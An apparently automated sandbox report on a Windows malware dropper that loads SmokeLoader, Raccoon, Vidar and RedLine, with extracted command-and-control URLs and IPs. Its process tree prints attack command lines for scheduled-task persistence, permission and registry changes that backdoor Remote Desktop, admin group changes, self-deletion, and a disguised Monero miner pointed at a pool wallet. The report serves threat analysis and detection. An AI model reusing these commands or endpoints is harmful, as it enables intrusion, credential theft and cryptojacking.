Analysis
- max time kernel: 119s
- max time network: 133s
- platform: windows7_x64
- resource: win7-en-20210920
- submitted: 11/10/2021, 17:18

Static task: static1

Behavioral task: behavioral1
- Sample: c10ebeb0d29119a2a7177f857318d012.exe
- Resource: win7-en-20210920

Behavioral task: behavioral2
- Sample: c10ebeb0d29119a2a7177f857318d012.exe
- Resource: win10v20210408

General
- Target: c10ebeb0d29119a2a7177f857318d012.exe
- Size: 337KB
- MD5: c10ebeb0d29119a2a7177f857318d012
- SHA1: 687672a6b2001376c192991c1b5237cf6467f393
- SHA256: 4eb02a90be27af84c49a2f62da8e179e5117d82db4e25c7a2c80e2954583bdb3
- SHA512: 447e1010864262bc642613b1f597507689d92353930a398bd85a24e2728ea7eb6ad75c413943966a5828422b380de2eff69725c0e5468125e2d9fa35a16df292
Malware Config

Extracted
- https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted: smokeloader
- Version: 2020
Extracted: raccoon
- Version: 1.8.2
- fbe5e97e7d069407605ee9138022aa82166657e6
- url4cnc
Extracted: vidar
- Version: 41.3
- 1033
- https://mas.to/@oleg98
- profile_id: 1033

Extracted: raccoon
- Version: 1.8.2
- 8d179b9e611eee525425544ee8c6d77360ab7cd9
- url4cnc
  - http://teletop.top/agrybirdsgamerept
  - http://teleta.top/agrybirdsgamerept
  - https://t.me/agrybirdsgamerept

Extracted: redline
- @Nastya_ero
- 45.14.49.66:21899

Extracted: raccoon
- Version: 1.8.2
- 98fe4f3d1d73378234d0a82f16cb8ad29d2d3e75
- url4cnc
Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (1 IoC)
- behavioral1/memory/472-140-0x00000000005E0000-0x00000000005FC000-memory.dmp (yara_rule: family_redline)

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

SmokeLoader
Modular backdoor trojan in use since 2014.

Arkei Stealer Payload (4 IoCs)
- behavioral1/memory/1684-127-0x0000000000400000-0x0000000000B71000-memory.dmp (yara_rule: family_arkei)
- behavioral1/memory/1684-128-0x0000000000400000-0x0000000000B71000-memory.dmp (yara_rule: family_arkei)
- behavioral1/memory/1684-129-0x0000000000400000-0x0000000000B71000-memory.dmp (yara_rule: family_arkei)
- behavioral1/memory/1684-136-0x0000000000400000-0x0000000000B71000-memory.dmp (yara_rule: family_arkei)

Grants admin privileges (1 TTP)
Uses net.exe to modify the user's privileges.

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)

Vidar Stealer (2 IoCs)
- behavioral1/memory/876-70-0x0000000000400000-0x0000000001735000-memory.dmp (yara_rule: family_vidar)
- behavioral1/memory/876-69-0x00000000002A0000-0x0000000000376000-memory.dmp (yara_rule: family_vidar)

Blocklisted process makes network request (2 IoCs)
- flow 79, PID 2596: powershell.exe
- flow 80, PID 2596: powershell.exe

Downloads MZ/PE file

Executes dropped EXE (20 IoCs)
- PID 368: 2443.exe
- PID 876: 29DF.exe
- PID 848: 34B9.exe
- PID 1280: 3B2F.exe
- PID 1796: 404F.exe
- PID 1964: 53B1.exe
- PID 1684: 6879.exe
- PID 472: 6C80.exe
- PID 1784: 76AE.exe
- PID 2200: 7FF2.exe
- PID 2288: 86D6.exe
- PID 2508: 9374.exe
- PID 456: services32.exe
- PID 2472: mine.exe
- PID 2552: 2soft.exe
- PID 2656: services64.exe
- PID 2836: sihost32.exe
- PID 3004: sihost64.exe
- PID 1840: services32.exe
- PID 2428: avvfhbw

Modifies RDP port number used by Windows (1 TTP)

Possible privilege escalation attempt (8 IoCs)
- PID 2756: icacls.exe
- PID 2820: icacls.exe
- PID 2836: icacls.exe
- PID 2848: icacls.exe
- PID 2384: takeown.exe
- PID 2396: icacls.exe
- PID 2712: icacls.exe
- PID 2688: icacls.exe

Sets DLL path for service in the registry (2 TTPs)

YARA rule vmprotect matched (5 IoCs)
- behavioral1/files/0x001100000001222b-101.dat (yara_rule: vmprotect)
- behavioral1/files/0x001100000001222b-103.dat (yara_rule: vmprotect)
- behavioral1/memory/1964-104-0x0000000000B30000-0x0000000001976000-memory.dmp (yara_rule: vmprotect)
- behavioral1/memory/2472-259-0x0000000000400000-0x0000000000B3C000-memory.dmp (yara_rule: vmprotect)
- behavioral1/memory/2552-262-0x0000000000400000-0x0000000000CF9000-memory.dmp (yara_rule: vmprotect)
Checks BIOS information in registry (2 TTPs, 8 IoCs)
BIOS information is often read in order to detect sandboxing environments.
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (34B9.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (34B9.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (6879.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (6879.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (7FF2.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (7FF2.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (9374.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (9374.exe)

Deletes itself (1 IoC)
- PID 1268: Process not Found

Loads dropped DLL (41 IoCs, listed once per process with the number of entries)
- PID 368: 2443.exe (7 entries)
- PID 1268: Process not Found (5 entries)
- PID 1720: WerFault.exe (4 entries)
- PID 1684: 6879.exe (5 entries)
- PID 2288: 86D6.exe (7 entries)
- PID 1852: cmd.exe (2 entries)
- PID 2200: 7FF2.exe (2 entries)
- PID 2624: cmd.exe (2 entries)
- PID 2456: Process not Found (2 entries)
- PID 1180: conhost.exe (2 entries)
- PID 2860: conhost.exe (2 entries)
- PID 2996: cmd.exe (1 entry)

Modifies file permissions (1 TTP, 8 IoCs)
- PID 2712: icacls.exe
- PID 2688: icacls.exe
- PID 2756: icacls.exe
- PID 2820: icacls.exe
- PID 2836: icacls.exe
- PID 2848: icacls.exe
- PID 2384: takeown.exe
- PID 2396: icacls.exe

Reads user/profile data of local email clients (2 TTPs)
Email clients store some user data on disk where infostealers will often target it.

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

YARA rule themida matched (6 IoCs)
- behavioral1/files/0x000700000001221a-73.dat (yara_rule: themida)
- behavioral1/memory/848-80-0x0000000000A70000-0x0000000000A71000-memory.dmp (yara_rule: themida)
- behavioral1/files/0x047600000000b53c-169.dat (yara_rule: themida)
- behavioral1/memory/2200-175-0x0000000001050000-0x0000000001051000-memory.dmp (yara_rule: themida)
- behavioral1/files/0x000a000000012296-201.dat (yara_rule: themida)
- behavioral1/memory/2508-206-0x00000000000D0000-0x00000000000D1000-memory.dmp (yara_rule: themida)

Accesses Microsoft Outlook accounts (1 TTP, 2 IoCs)
- Key opened \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts (2443.exe)
- Key opened \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts (86D6.exe)

Accesses Microsoft Outlook profiles (1 TTP, 16 IoCs)
Both 2443.exe and 86D6.exe open the same eight keys under \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000:
- Key opened ...\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook (2443.exe, 86D6.exe)
- Key opened ...\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook (2443.exe, 86D6.exe)
- Key opened ...\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook (2443.exe, 86D6.exe)
- Key opened ...\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook (2443.exe, 86D6.exe)
- Key opened ...\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook (2443.exe, 86D6.exe)
- Key opened ...\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook (2443.exe, 86D6.exe)
- Key opened ...\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook (2443.exe, 86D6.exe)
- Key opened ...\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook (2443.exe, 86D6.exe)

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Checks whether UAC is enabled (4 IoCs)
- Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (9374.exe)
- Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (34B9.exe)
- Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (6879.exe)
- Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (7FF2.exe)
Drops file in System32 directory (3 IoCs)
- File created C:\Windows\system32\rfxvmt.dll (powershell.exe)
- File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe)
- File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe)

Suspicious use of NtSetInformationThreadHideFromDebugger (4 IoCs)
- PID 848: 34B9.exe
- PID 1684: 6879.exe
- PID 2200: 7FF2.exe
- PID 2508: 9374.exe

Suspicious use of SetThreadContext (2 IoCs)
- PID 1144 (c10ebeb0d29119a2a7177f857318d012.exe) set thread context of PID 1524 (procid_target 27)
- PID 2860 (conhost.exe) set thread context of PID 3064 (procid_target 153)

Drops file in Windows directory (9 IoCs)
- File created C:\Windows\branding\wupsvc.jpg (powershell.exe)
- File opened for modification C:\Windows\branding\Basebrd (powershell.exe)
- File opened for modification C:\Windows\branding\ShellBrd (powershell.exe)
- File opened for modification C:\Windows\branding\wupsvc.jpg (powershell.exe)
- File created C:\Windows\branding\mediasrv.png (powershell.exe)
- File opened for modification C:\Windows\branding\mediasrv.png (powershell.exe)
- File opened for modification C:\Windows\branding\mediasvc.png (powershell.exe)
- File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\D5SAG2RLQSVNIMJAHKC6.temp (powershell.exe)
- File created C:\Windows\branding\mediasvc.png (powershell.exe)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (1 IoC)
- PID 1720 (WerFault.exe), pid_target 876, procid_target 29

Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
- Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (c10ebeb0d29119a2a7177f857318d012.exe)
- Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (c10ebeb0d29119a2a7177f857318d012.exe)
- Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (c10ebeb0d29119a2a7177f857318d012.exe)

Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (6879.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (6879.exe)

Creates scheduled task(s) (1 TTP, 4 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
- PID 2700: schtasks.exe
- PID 2152: schtasks.exe
- PID 2576: schtasks.exe
- PID 2760: schtasks.exe

Delays execution with timeout.exe (3 IoCs)
- PID 1844: timeout.exe
- PID 2104: timeout.exe
- PID 3056: timeout.exe

Kills process with taskkill (2 IoCs)
- PID 2748: taskkill.exe
- PID 2072: taskkill.exe

Modifies data under HKEY_USERS (4 IoCs)
- Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (WMIC.exe)
- Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (WMIC.exe)
- Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage (powershell.exe)
- Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0d4c331c4bed701 (powershell.exe)

Modifies registry key (1 TTP, 1 IoC)
- PID 2764: reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses (64 IoCs)
- PID 1524: c10ebeb0d29119a2a7177f857318d012.exe (2 entries)
- PID 1268: Process not Found (62 entries)

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
- PID 1268: Process not Found

Suspicious behavior: LoadsDriver (3 IoCs)
- PID 464: Process not Found
- PID 2456: Process not Found (2 entries)

Suspicious behavior: MapViewOfSection (1 IoC)
- PID 1524: c10ebeb0d29119a2a7177f857318d012.exe

Suspicious use of AdjustPrivilegeToken (41 IoCs, listed once per token/process pair with the number of entries)
- Token: SeShutdownPrivilege, PID 1268: Process not Found (8 entries)
- Token: SeDebugPrivilege, PID 1720: WerFault.exe
- Token: SeDebugPrivilege, PID 848: 34B9.exe
- Token: SeDebugPrivilege, PID 472: 6C80.exe
- Token: SeDebugPrivilege, PID 696: powershell.exe
- Token: SeDebugPrivilege, PID 2316: powershell.exe
- Token: SeDebugPrivilege, PID 2200: 7FF2.exe
- Token: SeDebugPrivilege, PID 2412: conhost.exe
- Token: SeDebugPrivilege, PID 2732: powershell.exe
- Token: SeDebugPrivilege, PID 2508: 9374.exe
- Token: SeDebugPrivilege, PID 2880: powershell.exe
- Token: SeDebugPrivilege, PID 3020: conhost.exe
- Token: SeRestorePrivilege, PID 2712: icacls.exe
- Token: SeAssignPrimaryTokenPrivilege, PID 1032: WMIC.exe (2 entries)
- Token: SeIncreaseQuotaPrivilege, PID 1032: WMIC.exe (2 entries)
- Token: SeAuditPrivilege, PID 1032: WMIC.exe (2 entries)
- Token: SeAssignPrimaryTokenPrivilege, PID 2344: WMIC.exe (2 entries)
- Token: SeIncreaseQuotaPrivilege, PID 2344: WMIC.exe (2 entries)
- Token: SeAuditPrivilege, PID 2344: WMIC.exe (2 entries)
- Token: SeDebugPrivilege, PID 2596: powershell.exe
- Token: SeDebugPrivilege, PID 2204: conhost.exe
- Token: SeDebugPrivilege, PID 2716: powershell.exe
- Token: SeDebugPrivilege, PID 1180: conhost.exe
- Token: SeDebugPrivilege, PID 2384: powershell.exe
- Token: SeDebugPrivilege, PID 2860: conhost.exe
- Token: SeLockMemoryPrivilege, PID 3064: explorer.exe (2 entries)
- Token: SeDebugPrivilege, PID 3028: conhost.exe

Suspicious use of FindShellTrayWindow (8 IoCs)
- PID 1268: Process not Found (8 entries)

Suspicious use of SendNotifyMessage (4 IoCs)
- PID 1268: Process not Found (4 entries)

Suspicious use of WriteProcessMemory (64 IoCs, listed once per source/target pair with the number of entries)
- PID 1144 (c10ebeb0d29119a2a7177f857318d012.exe) wrote to memory of PID 1524 (procid_target 27) (7 entries)
- PID 1268 (Process not Found) wrote to memory of PID 368 (procid_target 28) (4 entries)
- PID 1268 (Process not Found) wrote to memory of PID 876 (procid_target 29) (4 entries)
- PID 1268 (Process not Found) wrote to memory of PID 848 (procid_target 30) (4 entries)
- PID 1268 (Process not Found) wrote to memory of PID 1280 (procid_target 33) (4 entries)
- PID 1268 (Process not Found) wrote to memory of PID 1796 (procid_target 34) (3 entries)
- PID 876 (29DF.exe) wrote to memory of PID 1720 (procid_target 36) (4 entries)
- PID 1268 (Process not Found) wrote to memory of PID 1964 (procid_target 37) (3 entries)
- PID 368 (2443.exe) wrote to memory of PID 1028 (procid_target 38) (4 entries)
- PID 1028 (cmd.exe) wrote to memory of PID 1844 (procid_target 40) (4 entries)
- PID 1268 (Process not Found) wrote to memory of PID 1684 (procid_target 42) (4 entries)
- PID 1268 (Process not Found) wrote to memory of PID 472 (procid_target 43) (4 entries)
- PID 1964 (53B1.exe) wrote to memory of PID 696 (procid_target 44) (3 entries)
- PID 1268 (Process not Found) wrote to memory of PID 1784 (procid_target 46) (3 entries)
- PID 1684 (6879.exe) wrote to memory of PID 2064 (procid_target 48) (4 entries)
- PID 2064 (cmd.exe) wrote to memory of PID 2104 (procid_target 50) (4 entries)
- PID 696 (powershell.exe) wrote to memory of PID 2144 (procid_target 51) (1 entry)

outlook_office_path (1 IoC)
- Key opened \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook (86D6.exe)

outlook_win_path (1 IoC)
- Key opened \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook (86D6.exe)
Processes
-
C:\Users\Admin\AppData\Local\Temp\c10ebeb0d29119a2a7177f857318d012.exe"C:\Users\Admin\AppData\Local\Temp\c10ebeb0d29119a2a7177f857318d012.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1144 -
C:\Users\Admin\AppData\Local\Temp\c10ebeb0d29119a2a7177f857318d012.exe"C:\Users\Admin\AppData\Local\Temp\c10ebeb0d29119a2a7177f857318d012.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1524
-
-
C:\Users\Admin\AppData\Local\Temp\2443.exeC:\Users\Admin\AppData\Local\Temp\2443.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- Suspicious use of WriteProcessMemory
PID:368 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\2443.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:1844
-
-
-
C:\Users\Admin\AppData\Local\Temp\29DF.exeC:\Users\Admin\AppData\Local\Temp\29DF.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:876 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 8882⤵
- Loads dropped DLL
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1720
-
-
C:\Users\Admin\AppData\Local\Temp\34B9.exeC:\Users\Admin\AppData\Local\Temp\34B9.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:848
-
C:\Users\Admin\AppData\Local\Temp\3B2F.exeC:\Users\Admin\AppData\Local\Temp\3B2F.exe1⤵
- Executes dropped EXE
PID:1280
-
C:\Users\Admin\AppData\Local\Temp\404F.exeC:\Users\Admin\AppData\Local\Temp\404F.exe1⤵
- Executes dropped EXE
PID:1796 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\404F.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2412 -
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\AppData\Local\Temp\services32.exe"3⤵PID:2676
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\AppData\Local\Temp\services32.exe"4⤵
- Creates scheduled task(s)
PID:2700
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services32.exe"3⤵
- Loads dropped DLL
PID:1852 -
C:\Users\Admin\AppData\Local\Temp\services32.exeC:\Users\Admin\AppData\Local\Temp\services32.exe4⤵
- Executes dropped EXE
PID:456 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services32.exe"5⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1180 -
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"6⤵
- Executes dropped EXE
PID:2836 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "/sihost32"7⤵PID:2492
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\53B1.exeC:\Users\Admin\AppData\Local\Temp\53B1.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:696 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\06ipggcq.cmdline"3⤵PID:2144
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7EA3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7E92.tmp"4⤵PID:2164
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2880
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2384
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2396
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2688
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2756
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2820
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2836
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2848
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2120
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:2764
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:2772
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵PID:2888
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:2920
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵PID:2976
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵PID:2916
-
C:\Windows\system32\net.exenet start rdpdr5⤵PID:2928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2936
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:2892
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:3028
-
C:\Windows\system32\net.exenet start TermService5⤵PID:2608
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:2448
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2532
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1616
-
-
-
C:\Users\Admin\AppData\Local\Temp\6879.exeC:\Users\Admin\AppData\Local\Temp\6879.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\6879.exe" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Windows\SysWOW64\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:2104
-
-
-
C:\Users\Admin\AppData\Local\Temp\6C80.exeC:\Users\Admin\AppData\Local\Temp\6C80.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:472
-
[1] C:\Users\Admin\AppData\Local\Temp\76AE.exe (PID 1784)
    Command line: C:\Users\Admin\AppData\Local\Temp\76AE.exe
    - Executes dropped EXE
    [2] C:\Windows\System32\conhost.exe (PID 3020)
        Command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\76AE.exe"
        - Suspicious use of AdjustPrivilegeToken
        [3] C:\Windows\System32\cmd.exe (PID 2112)
            Command line: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
            [4] C:\Windows\system32\schtasks.exe (PID 2152)
                Command line: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                - Creates scheduled task(s)
        [3] C:\Windows\System32\cmd.exe (PID 2624)
            Command line: "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
            - Loads dropped DLL
            [4] C:\Users\Admin\AppData\Local\Temp\services64.exe (PID 2656)
                Command line: C:\Users\Admin\AppData\Local\Temp\services64.exe
                - Executes dropped EXE
                [5] C:\Windows\System32\conhost.exe (PID 2860)
                    Command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                    - Loads dropped DLL
                    - Suspicious use of SetThreadContext
                    - Suspicious use of AdjustPrivilegeToken
                    [6] C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe (PID 3004)
                        Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                        - Executes dropped EXE
                        [7] C:\Windows\System32\conhost.exe (PID 1748)
                            Command line: "C:\Windows\System32\conhost.exe" "/sihost64"
                    [6] C:\Windows\explorer.exe (PID 3064)
                        Command line: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=gulf.moneroocean.stream:10128 --user=43m2K5awHfSB4ZtTTJepVVjkWDTnExdqDaHKwv9thKTK9dZAJwzUACebcQnZqMPRLS4keNBn7ZVNdUxtCTCPAx7D43jcvdC --pass= --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
                        - Suspicious use of AdjustPrivilegeToken

[1] C:\Users\Admin\AppData\Local\Temp\7FF2.exe (PID 2200)
